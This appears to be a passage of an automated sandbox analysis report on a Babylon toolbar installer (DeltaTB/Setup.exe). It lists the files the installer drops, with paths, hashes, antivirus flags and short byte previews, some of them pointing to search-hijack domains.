                                                                                                                                                            SHA-512:D973F9CB45D2035A8546BBDF77FA1B239A3F1E4BA2B17D32195A1CFED13FE06AAF48B91A133CEBD7E53481AB5A5E9166329B730587B46A154B193779DA6AD737
                                                                                                                                                            Malicious:true
                                                                                                                                                            Antivirus:
                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 5%
                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........5..w[..w[..w[.....w[.....w[.....w[..%..w[.. ..w[..5..w[..wZ.pw[.....w[.....w[..%..w[.....w[.Rich.w[.........PE..L.....P...........!.....V..........(p.......p...............................`............@.........................`...S.......d.... .......................0.......r..................................@............p......l...`....................text....U.......V.................. ..`.rdata...K...p...L...Z..............@..@.data..../..........................@....SHARDAT. ......."..................@....rsrc........ ......................@..@.reloc... ...0..."..................@..B........................................................................................................................................................................................................................................................................

                                                                                                                                                            C:\Users\user\AppData\Local\Temp\8A431A81-BAB0-7891-9C65-69A9AC1B2A54\Latest\Babylon.dat

                                                                                                                                                            Download File
                                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\8A431A81-BAB0-7891-9C65-69A9AC1B2A54\Setup.exe
                                                                                                                                                            File Type:data
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):12384
                                                                                                                                                            Entropy (8bit):5.999166475309639
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:192:6SqGSumjR7rVILJ7hzEJboFI1BI1x7RpjEie/X6S8k0oP0dNdNhkAU0RSB2rBkEl:iGJmRyJyJb71C1x7R4a+0RSGPB
                                                                                                                                                            MD5:825E5733974586A0A1229A53361ED13E
                                                                                                                                                            SHA1:9EC5B8944C6727FDA6FDC3C18856884554CF6B31
                                                                                                                                                            SHA-256:0A90B96EAF5D92D33B36F73B36B7F9CE3971E5F294DA51ED04DA3FB43DD71A96
                                                                                                                                                            SHA-512:FF039E86873A1014B1F8577AEC9B4230126B41CC204A6911CD372D224B8C07996D4BB2728A06482C5E98FB21F2D525395491F29D428CDD5796A26E372AF5AD4E
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:Ao...............................d......2.......................................................'...Babylon Trial..........2.............................................................'...Babylon..........2..............'...Englishtown..........2............................................................................'...Babylon..........2....'...Babylon Viewer..........2........................... ......'...Babylon Public..........2........................'..-Babylon Online/Offline Viewer..........2........................'..%Babylon Online Viewer..........2........................'..&Babylon Offline Viewer..........2........................'..&Babylon Premium Viewer..........2................................ ......'..#Babylon-Pro Classic..........2............................................................................'..+Babylon (Corporate Edition)..........2.......................................... ......'.."Babylon (Standard)..........2..............'...Englishtown.......

                                                                                                                                                            C:\Users\user\AppData\Local\Temp\8A431A81-BAB0-7891-9C65-69A9AC1B2A54\Latest\HtmlScreens\loading.html

                                                                                                                                                            Download File
                                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\8A431A81-BAB0-7891-9C65-69A9AC1B2A54\Setup.exe
                                                                                                                                                            File Type:HTML document, ASCII text, with CRLF line terminators
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):644
                                                                                                                                                            Entropy (8bit):5.2453607077208835
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:12:hnMEwuiuX4w4vy4WhPHMNUyXUoZhYpNtlVGlKN7HClolEJqNYMxhCRCBRPGu:hMNmMvy4WJHGp/YEaREJNMN5
                                                                                                                                                            MD5:F50FA4673555652289652753183FD1EE
                                                                                                                                                            SHA1:F496797F0D34EB866D6328D2FD1492B485F74D0A
                                                                                                                                                            SHA-256:AFB21B51CEAD30ED14F79293D50B9C3C7A706B5287AAD6CDE06EA44A364DF812
                                                                                                                                                            SHA-512:6E92B13343AD35A8A8C61E54CE3ABB9A28ABEEC4AA8C765326E0D1EC111C7656D8F0F349C44820FB1ABA6730C22F84F7411C0C0B24322BDAA8A977B79BAA23DA
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">..<html xmlns="http://www.w3.org/1999/xhtml">..<head>..</head>..<body style="width:550px; background-color:#d4e7fe">.. <div id="bdy" style="margin: 150px auto; height: 100px; width: 220px;">.. <div>.. <div style="text-align:center; font-size:17px; padding:2px; behavior: url(#default#BabDefBhv:text);">IDS_LOADING</div>.. <div style="margin:5px auto; width:32px;">.. <img id="roundProgress" src="pBar.gif" />.. </div>.. </div>.. </div>..</body>..</html>..

                                                                                                                                                            C:\Users\user\AppData\Local\Temp\8A431A81-BAB0-7891-9C65-69A9AC1B2A54\Latest\HtmlScreens\navError.html

                                                                                                                                                            Download File
                                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\8A431A81-BAB0-7891-9C65-69A9AC1B2A54\Setup.exe
                                                                                                                                                            File Type:HTML document, ASCII text, with CRLF line terminators
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):926
                                                                                                                                                            Entropy (8bit):5.348370067881831
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:12:hnMEwuiuX4w4vy4Wh7qJmuMu5+nulOlkkQ2VMCHMNUyXUoZhY+dDNtloNGlomqNt:hMNmMvy4Wa9XlgkkQ+MCHGp/Y+dFzsx5
                                                                                                                                                            MD5:0C464E407C81764EBC09EACBE41F0B3E
                                                                                                                                                            SHA1:245AFE550A05215E5873D8F5F21C22D12AA46B6A
                                                                                                                                                            SHA-256:770A302BC58B513472AA603AE44A365A6F4F8CBDDC13D2692F71B09F143F8A26
                                                                                                                                                            SHA-512:71070FCD243CBB3E4452874ECAF8E20E13CBBBAD0009CE543CA49601FACC1AB1906C298849D3B8FB5747DF1109F8E85946243EC7BFA0EAD97CA0AED9EC8D3DFC
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">..<html xmlns="http://www.w3.org/1999/xhtml">..<head>.. <script type="text/javascript">.. function exitSetup() {... window.external.openPage('{"name":"error"}');...}.. function onXBtnPress() {... exitSetup();... return true;.. }.. </script>..</head>..<body style="width:550px; background-color:#d4e7fe">.. <div id="bdy" style="margin: 150px auto; height: 100px; width: 500px;">.. <div>.. <div style="font-size:17px; padding:2px; behavior: url(#default#BabDefBhv:text);">IDS_NAV_ERROR</div>.. <div style="margin:30px auto; width:32px;">.. <input type="button" id="exit" value="BTN_CLOSE" class="BAB_BhvElm" onclick="exitSetup()" style="behavior: url(#default#BabDefBhv:text);" />.. </div>.. </div>.. </div>..</body>..</html>..

                                                                                                                                                            C:\Users\user\AppData\Local\Temp\8A431A81-BAB0-7891-9C65-69A9AC1B2A54\Latest\HtmlScreens\pBar.gif

                                                                                                                                                            Download File
                                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\8A431A81-BAB0-7891-9C65-69A9AC1B2A54\Setup.exe
                                                                                                                                                            File Type:GIF image data, version 89a, 32 x 32
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):3208
                                                                                                                                                            Entropy (8bit):7.524069178961416
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:48:3CwXprsPLjhI4TRpiPDZmjbzpB0IDmkgl/gpx2ugG1LyZtAegoA/3wlSMilKphGa:3J5YPxIRiq/qpx2F3ZtA1oC3TMnphOQ
                                                                                                                                                            MD5:26621CB27BBC94F6BAB3561791AC013B
                                                                                                                                                            SHA1:4010A489350CF59FD8F36F8E59B53E724C49CC5B
                                                                                                                                                            SHA-256:E512D5B772FEF448F724767662E3A6374230157E35CAB6F4226496ACC7AA7AD3
                                                                                                                                                            SHA-512:9A19E8F233113519B22D9F3B205F2A3C1B59669A0431A5C3EF6D7ED66882B93C8582F3BAA13DF4647BCC265D19F7C6543758623044315105479D2533B11F92C6
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:GIF89a . ......."G....~.....Gh.]|..........6Y.$H..........!..Created with ajaxload.info.!.......!..NETSCAPE2.0.....,.... . ......Iia....bK.$.F...R.A.T.,..2S.*05//.m.p!z...0...;$.0C....I*!.HC(A@.o...!39T5.\.8)....`..d..wxG=Y..g...wHb..v.A=.0.V\.\.;........;...H.........0..t%.Hs..rY<H..........b..Z.b.OEg:...GY]..=.A.OQ.s....\b.h.9.=sg...c..e....*...f.7D..!.......,.... . ......IiY...YF5..F..R..Tb.G.J....L..d...&.Ymx...... \...@........ ....1..&R....H..4.1Q..|V..%.z.v...#j0....l.Gg{0~..<.<..[.[.h.x..G...y.........[.0....G.....P.z...h...kz..i....y....h|z.h.G..V.......\h..[........&.+..W.7.8...!..!.......,.... . ......I)1....1G5d].(..R..T2..jL.{..< .[.5.M....0..)... L...I...m..E..`....p..U....^f.%..^.......u.;..zz.}0.X....S0.ew.y.k<..%..O.......z..{....|......%......F.i.1.0......Y.....8.x.....z..@....<...............8..Y<......8.\.P.$...!......!.......,.... . ......I.....g.EU... .R.a.TB.....p>'...e..$.."...\.#E1C.n.....~...J.,..,Aa.....Uw^4.I%P....u.Q.33.{0..i1T

                                                                                                                                                            C:\Users\user\AppData\Local\Temp\8A431A81-BAB0-7891-9C65-69A9AC1B2A54\Latest\IEHelper.dll

                                                                                                                                                            Download File
                                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\8A431A81-BAB0-7891-9C65-69A9AC1B2A54\Setup.exe
                                                                                                                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):6144
                                                                                                                                                            Entropy (8bit):4.32136921936664
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:96:/JWaDD77eJq0VOs/i5VSweLvuRBUlXVCt6:BT77Gq0ss/4SweoBwk
                                                                                                                                                            MD5:A21DE5067618D4F2DF261416315ED120
                                                                                                                                                            SHA1:7759A3318DE2ABC3755EBB7F50322C6D586B5286
                                                                                                                                                            SHA-256:6D13D2967A37BA76F840CD45DBA565C5D64938A99D886243F01713CD018E53CA
                                                                                                                                                            SHA-512:6B5C40D09A9548FDE90C1B1127A36E813525BEA6FF80D5FB0911DDEF67954B209DF44CBF4714CD00C4E2E4DA90CFC4967DB7174C28F751F7C5B881FA18CC938A
                                                                                                                                                            Malicious:true
                                                                                                                                                            Antivirus:
                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........v..............................o.......o.......o......Rich............................PE..L.....P...........!......................... ......................................V}....@..........................#..w...."..P....`.......................p......P ............................................... ..L............................text............................... ..`.rdata....... ......................@..@.data.... ...0......................@....rsrc........`......................@..@.reloc.......p......................@..B................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                            C:\Users\user\AppData\Local\Temp\8A431A81-BAB0-7891-9C65-69A9AC1B2A54\Latest\Setup2.zpb

                                                                                                                                                            Download File
                                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\8A431A81-BAB0-7891-9C65-69A9AC1B2A54\Setup.exe
                                                                                                                                                            File Type:data
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):3844
                                                                                                                                                            Entropy (8bit):7.9473327809209735
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:96:JoZggOWDGmubGYXwfR1ZCeeIV7Bwbuq44oP:yy3WFYXwNneEIA3
                                                                                                                                                            MD5:5E6230B3B16798E23720958756AC6D9E
                                                                                                                                                            SHA1:C7BCB001C48A67D4C9D6E70E92473EBD85B30585
                                                                                                                                                            SHA-256:D49EC47F5D27A09A17E00A6EB78F49A761C9F5881EC81FB07CC49FD0A5F287B2
                                                                                                                                                            SHA-512:6B1C132F0E4FC2CA6B5E8D807671C586D84E044E4DB8380682FD4D071160177C0F7E7A6AFAE3EE74A4FBD5C65ACA0C0876948F5A42DEAFDBB685C5B7989B5AAE
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:.x.......]....L".........=...O...k..#...-Xi;.).s_.!.Ep7.QP..:,D..Z.zK..^.2..@..w.BF.RA-.E.(u.o.}..Z..KV..U..r..%Z....y.2Gg..V^....^..H..e...A.....p...;H9..Q'aU3..m/..'..'.By..I.....A.|...=.h..B'-...>.........(..c...5..?...}...q..S.VN..Ju...v..Z.....]..f...\O].X....P;+^..U.3...t8F."..d._........A..[.TY..,.O.....4A..z...A.Z..b1..Xr.R..!z\..D..v.).Y..JD....G..u^..%.N<..ZG(..\D..J.&....L[..... .../..a.z. }..a..rs)l...-^^...........{..l...v.&...5.)...F?..R.yS.t...=~IF..!.".[`.4V...5..kIZE....qM..#...1...qW.~.....;.K....w.^....{..s.%.U|....ns./9..%..x>CY...V.k.....9y..%.x.KA].T.T....5.;..{".B..M2.....3...2.q..WU}....2..}hyo.5.<3.....4Aa.[..H.`.}...o.....Zu..['...j..\B{.7H..\.*u.....3(..`..b...eRU..,.K=nM..dx.h..o.$...TV.k1.f..3.....?.t.....q...TG.q..a.p......W..?."u].@L.D.P..kY.....^<..`..Xaq~..R.N..A*.{w.=.6..<...Xo'.hc.Ok......*.!}..5..y.e._....)aM...c.j.&M...<"..ML..x....O....m.E.=..W.xx.J.S*[OR..V........\...3.A.CK..AY..XZ.c...m..

                                                                                                                                                            C:\Users\user\AppData\Local\Temp\8A431A81-BAB0-7891-9C65-69A9AC1B2A54\Latest\SetupStrings.dat

                                                                                                                                                            Download File
                                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\8A431A81-BAB0-7891-9C65-69A9AC1B2A54\Setup.exe
                                                                                                                                                            File Type:data
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):91790
                                                                                                                                                            Entropy (8bit):7.9969876797429755
                                                                                                                                                            Encrypted:true
                                                                                                                                                            SSDEEP:1536:YYMRZJnf4lTn61qnl4nJszUaFsQZFWT9a5wSFU/BTi5MjmMoa7OYCVumZJBE:YYgJmOs4nJwFRZFSa5vUoumaE8mZJBE
                                                                                                                                                            MD5:407846797C5BA247ABEB5FA7C0C0BA05
                                                                                                                                                            SHA1:44386455EED8E74D75E95E9E81E96A19F0B27884
                                                                                                                                                            SHA-256:0147B5B11B935310752666FCF1E6AFC922B76FF03D01A0D1EE2BABEAC10CA1E3
                                                                                                                                                            SHA-512:7399A9228F971698DB7362AAD28D3F9694C0BF453D4529E48BC7869AF0960452CFE1A5F0A5754E7D567D81B5AA1E35BE05A9E36EC745E5470D20FD44A61D20AF
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:C.e....x..k.\...D6v......}....R.cc.4m......d..c.;.2O..*3O..<%..{........X`C.....z Q..&:.;.g&J1..NL..V..L.D..wz.L...{.GV...q.#.*.>{...z|k...#K...G?...&.......f.^..7....F.ma.....,<.\ei.4...f....{...^'.&b.u.H...o........&.>4..o2..<}{8.{....t,=.b.N.`..T...i...:..n...p.w0LBo*....-....5..7.4..{...z..n.t+.5.4.._.v..L.........i.g...!.@..l..N)..........!=.s..`......L.@. 9s.z.L..a..o...Z....OWj.V.^.t...p.^....q.]..ye.{.4....n...7...f38.b7.[.t..o..?..../z..3G.Vi...T.....u.~~Y.>...b.?....4B`.-.+.m...(<.b..{3.d..~....c.N..n.Q.Vj...4.q...m.f.wq.[>....Nw..7...`a,-.Ga.....|..o......FS.?......w3....Cu.#>s...0........V.'.-X.8..%...J.["......&,....Jm...v..{..K.o.......O..t..?.....>w....7..._.....T...?`..._R.E.v...L.I.*./j....#....]Q....OH.J..+7.?7.)..X..+W.?=.6Y./.\1.O.^5.P4...~..I..~$h.bE._/.|...Q4.m.p..u.ho..o~St..4n.i.b...".......V.U../.....d=..K+W...o..+...t.....[ae[.....u......{.o..U..B.S?K*W...B..?..k...cc3.....o...d...............U#.

                                                                                                                                                            C:\Users\user\AppData\Local\Temp\8A431A81-BAB0-7891-9C65-69A9AC1B2A54\Latest\bab033.tbinst.dat

                                                                                                                                                            Download File
                                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\8A431A81-BAB0-7891-9C65-69A9AC1B2A54\Setup.exe
                                                                                                                                                            File Type:data
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):205
                                                                                                                                                            Entropy (8bit):4.9535990881965635
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:3:SC2nnnPjnu5AqBQW1ALepBTY2EUHgLJpB1GHGDusAY75E8SlQkQGEie0GUGl:SDnPoPB/mLepBREUALJv1TX9EDKJ5sGl
                                                                                                                                                            MD5:90713AB7A74884CD36A5FB4CFCDECE8A
                                                                                                                                                            SHA1:7BB56D08FD69A98E543B923BD0A9156F92A9C473
                                                                                                                                                            SHA-256:BC40813F6D07DBC1A4D4C74363460D1AD6EE76275729DE4C4F10EC40D8CC46EB
                                                                                                                                                            SHA-512:639D68135FB54264F2E21081D6CA9FFE73A94035982F4A2D7133D6D402CDD3EF4A695EEB61AD173DC6D1B8167D1F5DF2BE61A972C96F07AC357ECEC887A0D191
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:A>..................c.......e..HKEY_NONE........babtb1........8..babylonsig=0000ddc5393a3898d6fab33f1b7634f4cacf2f4dc9ddfcbcc1defbd0ce593049:0000d32e061a0029c5ccdae47322435ba6e55cac53459f5d334a8ccfc03203ca

                                                                                                                                                            C:\Users\user\AppData\Local\Temp\8A431A81-BAB0-7891-9C65-69A9AC1B2A54\Latest\bab091.norecovericon.dat

                                                                                                                                                            Download File
                                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\8A431A81-BAB0-7891-9C65-69A9AC1B2A54\Setup.exe
                                                                                                                                                            File Type:data
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):174
                                                                                                                                                            Entropy (8bit):4.747151880874695
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:3:L2lhgnnn/9HNhcGVUDTERd8oDFLSbhlVEHgUVwkdHYzHcLSTp43FQClB/YcYN:LChgnl8GVUDTERCoDt8V8PVwkFYqSVgE
                                                                                                                                                            MD5:4F6E1FDBEF102CDBD379FDAC550B9F48
                                                                                                                                                            SHA1:5DA6EE5B88A4040C80E5269E0CD2B0880B20659C
                                                                                                                                                            SHA-256:E58EA352C050E6353FB5B4FA32A97800298C1603489D3B47794509AF6C89EC4C
                                                                                                                                                            SHA-512:54EFC9BDE44F332932A97396E59ECA5B6EA1AC72F929CCFFA1BDAB96DC3AE8D61E126ADBD26D12D0BC83141CEE03B24AD2BADA411230C4708B7A9AE9C60AECBE
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:A...................j........<\...babylonsig=000073e9c01f6a45cc864dc02a0f7bf8bcabc4db855fc5bd7a04d0abc34be5df:0000050db25f8bdf7e3b9e906bf562b69d8997079c552e0c644fd006193bd428

                                                                                                                                                            C:\Users\user\AppData\Local\Temp\8A431A81-BAB0-7891-9C65-69A9AC1B2A54\Latest\bab148.spreg.dat

                                                                                                                                                            Download File
                                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\8A431A81-BAB0-7891-9C65-69A9AC1B2A54\Setup.exe
                                                                                                                                                            File Type:data
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):249
                                                                                                                                                            Entropy (8bit):5.365979053267958
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:6:t8knqres54xUSIJY7rsNXVO5HzVUTA010HkiYKoYb7orHTMS:t8knqPCxUNYXsFcNzVUM0109Y6/ozTT
                                                                                                                                                            MD5:A4AF0A0C254B38F2F9EECBF0E00B08FE
                                                                                                                                                            SHA1:EF730BCE77699730DDA378DC444B997CE7CEEA7A
                                                                                                                                                            SHA-256:810E0E32D54B9E1557DA7CCF1CA9F6354814E90DADC6B4AF5E1CBDF87FAC925A
                                                                                                                                                            SHA-512:B74596E55E75413303559C135DB393A04D6FD6CBAB147A51AC2F46435F52B92B82868DE4E67917A7B388D82C672FA36B525B88E2EEFE7EC40695F028395DCD84
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:A@i....................@YHKEY_CLASSES_ROOT\AppID\{BDB69379-802F-4eaf-B541-F8DE92DD98DB}\Instl\Data...........babylonsig=000100374627dcb412ef9c7f6e6383eb408216ef2e8c99cab4a28ea690db202a:00006cc208e02b54e138d1ec1b02ef66d0b7f8e02d0d3a2c12c6a72548b0fc07

                                                                                                                                                            C:\Users\user\AppData\Local\Temp\8A431A81-BAB0-7891-9C65-69A9AC1B2A54\Latest\bab187.wl.dat

                                                                                                                                                            Download File
                                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\8A431A81-BAB0-7891-9C65-69A9AC1B2A54\Setup.exe
                                                                                                                                                            File Type:data
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):234
                                                                                                                                                            Entropy (8bit):5.1257718700950665
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:3:elm7gnnn7nlun8FxIEyLdKC1xZ1jPAUFA9EHANrQ3wV39VuVUjKGBTc6+HYXDwDe:fgn8n8zIxdK2HG7EgNEg39MmIYXUDQQU
                                                                                                                                                            MD5:6358860CD0C336C1F91F86BE701D77C4
                                                                                                                                                            SHA1:5DD38B818BF0860B4C5144BA670A759D4345E4EC
                                                                                                                                                            SHA-256:2ED42E3C958EB21352BAE4B00DB2FA5BE94149ABC64EEC93E5258B9C4A715457
                                                                                                                                                            SHA-512:7DF3B3E1487D3A65000B6208969F1E695815133C052F369BEB36877FE5C6F64D979AEFD030A193B04A5E46FB0D97A3CC06837AA381EFE6BC24A0C084C768DAC1
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:A@Z..............2........."search.babylon.com.......$www.claro-search.com...... .........9...babylonsig=000014b501afb12514e838be35fd24590f9f095658a0cdd234df33a6003ea621:0000627597f0acd7d524976ccd69bab0cb4198771d23d12f21d1af554430d7ef

                                                                                                                                                            C:\Users\user\AppData\Local\Temp\8A431A81-BAB0-7891-9C65-69A9AC1B2A54\Latest\bab307.sp_pop0.dat

                                                                                                                                                            Download File
                                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\8A431A81-BAB0-7891-9C65-69A9AC1B2A54\Setup.exe
                                                                                                                                                            File Type:data
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):178
                                                                                                                                                            Entropy (8bit):4.797553801917334
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:3:PC2nnnxnzkS2gfE8JfizV3RT3d/7lkVVYQdyFE6MBvhShRO7H/bSGPX:62n+S2V8Vu3139lkVVYX+NB8ADT1PX
                                                                                                                                                            MD5:0B7BE9C4B72C2C5166BFD61CA5EBBFED
                                                                                                                                                            SHA1:AEA0AA4E8226C1B4EFCE92E909DA773744BAA6D4
                                                                                                                                                            SHA-256:673BF972D308BC6108360575608CF72F393413F2D3993489B06DA4A6EFC749BD
                                                                                                                                                            SHA-512:4DCD7EA01B05550ACB00B71E7E9FDD52A04FE1CC574655030DCAE94B87DAD86BFB7973ADF9185DE03BCACB100FFF758B1A2F928FCB951E2B31E320860A2226D8
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:A#..............2.................b+..babylonsig=0000b7d47988ec9b6d29c69c2d65aa0453a80949ffe47b173bcbcbaf1664b37f:0000d475e18513509c850255a7e329dacbd702f4edee04be1371ccd95bc05742

                                                                                                                                                            C:\Users\user\AppData\Local\Temp\8A431A81-BAB0-7891-9C65-69A9AC1B2A54\Latest\bab456.TB_OldWay.dat

                                                                                                                                                            Download File
                                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\8A431A81-BAB0-7891-9C65-69A9AC1B2A54\Setup.exe
                                                                                                                                                            File Type:data
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):174
                                                                                                                                                            Entropy (8bit):4.752125358171384
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:3:L2lhgnnnShk1X3slFi0U6tgFnlHOW8O+NYXnbcE0aBSVXdE1TbSXQK:LChgnShklvkWFnd+2XbciSV0SXQK
                                                                                                                                                            MD5:7E72D256E34635D351092955D1F8516B
                                                                                                                                                            SHA1:7F240F8F4BD61AE59247D84D0EC85F5BC8729F36
                                                                                                                                                            SHA-256:39EB1667A67149B5D930E5408896027E3C3FC06282735E61CB8D85F5B38F587C
                                                                                                                                                            SHA-512:621EB4BF2864DB2FA0F861C233CED790124E9060C081948BEB7117F8C058A36ECCA23EE05CE2D6D42AF15533C050F648D276589682D91DFE699EBE871CC9AE8C
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:A..............................o|.babylonsig=0000f7ffd199a6d07f03f6b2b8764a34a26e4dc1ed5ba9a3d998872127314113:0000cb9730cf6e41158f8f209a78d8121f40b07026490a300c0a084fb724d516

                                                                                                                                                            C:\Users\user\AppData\Local\Temp\8A431A81-BAB0-7891-9C65-69A9AC1B2A54\Latest\kstp.txt

                                                                                                                                                            Download File
                                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\8A431A81-BAB0-7891-9C65-69A9AC1B2A54\Setup.exe
                                                                                                                                                            File Type:very short file (no magic)
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):1
                                                                                                                                                            Entropy (8bit):0.0
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:3:U:U
                                                                                                                                                            MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                                                                            SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                                                                            SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                                                                            SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:1

                                                                                                                                                            C:\Users\user\AppData\Local\Temp\8A431A81-BAB0-7891-9C65-69A9AC1B2A54\Latest\setup.exe

                                                                                                                                                            Download File
                                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\8A431A81-BAB0-7891-9C65-69A9AC1B2A54\Setup.exe
                                                                                                                                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):8704
                                                                                                                                                            Entropy (8bit):4.98329973703044
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:96:TvYfTLHRm6VMp8PS5JTMNF4m1AcFM8S6Y3+IsONTv2e6BL:TvY+8PS5JwHV1Te8S6YW6Tv2e6
                                                                                                                                                            MD5:5790A04F78C61C3CAEA7DDD6F01829D2
                                                                                                                                                            SHA1:9D783D964338A5378280DD3C3B72519D11F73FFA
                                                                                                                                                            SHA-256:726B0E7E515F7BD62C912B094FA95C7C2285A44E03D264F5DD9E70729C0E9606
                                                                                                                                                            SHA-512:9134FC02095E313FCB528FA32C8534929FDDFB7B7B139A829F2B3EB32CD4C606F6D2EC6DFF57A890EA250CE1430EB272461ACCFE05164BD4CFA496C0A1474AD0
                                                                                                                                                            Malicious:true
                                                                                                                                                            Antivirus:
                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........'.BSF..SF..SF....P.RF....S.[F..Z>..XF..SF..aF....R.VF....T.RF....Q.RF..RichSF..................PE..L...*.R..................................... ....@..........................p............@.................................H&..P....P.......................`......p ..8............................&..@............ ..h............................text...*........................... ..`.rdata..,.... ......................@..@.data........0......................@....CRT.........@......................@..@.rsrc........P......................@..@.reloc..B....`......................@..B................................................................................................................................................................................................................................................................................................

                                                                                                                                                            C:\Users\user\AppData\Local\Temp\8A431A81-BAB0-7891-9C65-69A9AC1B2A54\Latest\sqlite3.dll

                                                                                                                                                            Download File
                                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\8A431A81-BAB0-7891-9C65-69A9AC1B2A54\Setup.exe
                                                                                                                                                            File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):520234
                                                                                                                                                            Entropy (8bit):6.562174410690013
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:6144:RgEF6lmEVKtkDCQ/kUrc7dBLhuKgrQCjBXPTnrKcCxcfKvrLJLqgx5YMk4HJ0yPF:GEEdkUrc7RuKcQCdGVtT0MkCwwV/Hn
                                                                                                                                                            MD5:0F66E8E2340569FB17E774DAC2010E31
                                                                                                                                                            SHA1:406BB6854E7384FF77C0B847BF2F24F3315874A3
                                                                                                                                                            SHA-256:DE818C832308B82C2FABD5D3D4339C489E6F4E9D32BB8152C0DCD8359392695F
                                                                                                                                                            SHA-512:39275DF6E210836286E62A95ACE7F66C7D2736A07B80F9B7E9BD2A716A6D074C79DEAE54E2D21505B74BAC63DF0328D6780A2129CDFDA93AEC1F75B523DA9E05
                                                                                                                                                            Malicious:false
                                                                                                                                                            Antivirus:
                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...h..K........... ...8.$...t...............@.....`.......................................... ......................`..,.......P...............................H!...................................................................................text....#.......$..................`..`.data...8....@.......(..............@....bss.........P...........................edata..,....`.......6..............@....idata..P............N..............@....reloc..H!......."...V..............@....stab...l............x.................B.stabstr...............................B................................................................................................................................................................................................................................................................................................................

                                                                                                                                                            C:\Users\user\AppData\Local\Temp\8A431A81-BAB0-7891-9C65-69A9AC1B2A54\Setup.exe

                                                                                                                                                            Download File
                                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\DeltaTB.exe
